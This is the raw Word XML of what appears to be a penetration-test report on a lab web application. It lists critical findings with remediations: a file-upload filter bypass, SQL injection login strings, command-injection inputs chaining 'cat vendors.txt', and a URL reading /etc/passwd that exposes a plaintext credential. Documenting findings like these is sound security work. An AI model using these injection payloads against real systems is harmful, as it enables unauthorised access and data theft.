        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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7">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">While the image upload page has basic file type validation it looks for the presence of “.jpg” thus renaming our php file from “script.php” to “script.jpg.php” </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="405" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">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A">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B">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C">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BD">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BE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">More in depth file validation and segregation of the database that stores the uploaded files in a sandbox environment. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1">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3">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C4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (Admin Login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C5">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6">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C7">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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9">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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The login page for admins is vulnerable to sql injection,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Entering “ok’” or “1=1--” in the login password field grants admin login. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1714500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="43"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4657725" cy="1714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E">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F">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D0">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D1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Input Validation - Disallow the web application from accepting direct input and/or implement character escaping. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5">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7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Poor Storage of Secure Credentials </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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A">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D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C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin Login details are stored on the login page in plain text next to each login field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1752600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="34"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4657725" cy="1752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1">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2">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E3">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E4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove this from the html and add two factor authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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C">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E">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EF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Poor Storage of Sensitive Data </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">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1">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F2">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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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4">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical information relating to server file structure accessible via webpage. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.14.35/robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2463800"/>
                  <wp:effectExtent b="0" l="0" r="0" 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657725" cy="2463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A">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F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FC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Disallow public access to 192.168.14.35/robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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F">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1">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02">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Line Injection </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">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4">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05">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">On the networking.php page there are several command line vulnerabilities. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000209">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">On the first entry field there is no entry validation and thus the vendors.txt file can be accessed with either. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId17">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">www.wecometorecall.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp;&amp; cat vendors.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId18">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">www.welcometorecall.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ; cat vendors.txt </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The second entry field applies some basic input validation stripping both &amp;&amp; and ; from the input. This however is easily worked around using the following input </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId19">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">www.welcometorecall.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | cat vendors.txt </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Also able to put “splunk” as an input where shouldn't be possible.</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0">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2819400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="29"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4657725" cy="2819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3">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14">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15">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Further input validation needs to be applied as well as not disclosing the file name of the vendors.txt file on the page. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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9">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1C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PHP Injection </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000221">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">By altering the webpage url to:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:hyperlink r:id="rId21">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">http://192.168.14.35/disclaimer.php?page=/etc/passwd</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">It is possible to see the passwd file of which there is an unhashed password for the account melina;melina </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This is a major security violation and issue where a standard user is able to access what should be a majorly secure file.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5">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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="4546600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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4657725" cy="4546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8">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22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2A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the ability for navigation to be made from the networking page via input validation. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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F">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30">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WHOIS Registry Exposure </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000231">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="6aa84f"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">All websites are required to have contact information about the registrant submitted to WHOIS so that records can be kept. However several domain registers offer a service to hide this information and provide the register such as godaddy or google domains information instead of the domain holders information. Currently the domain owners full information is publicly available on the WHOIS registry posing a potential risk as an entry point for social engineering by malicious actors. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="4470400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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657725" cy="4470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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
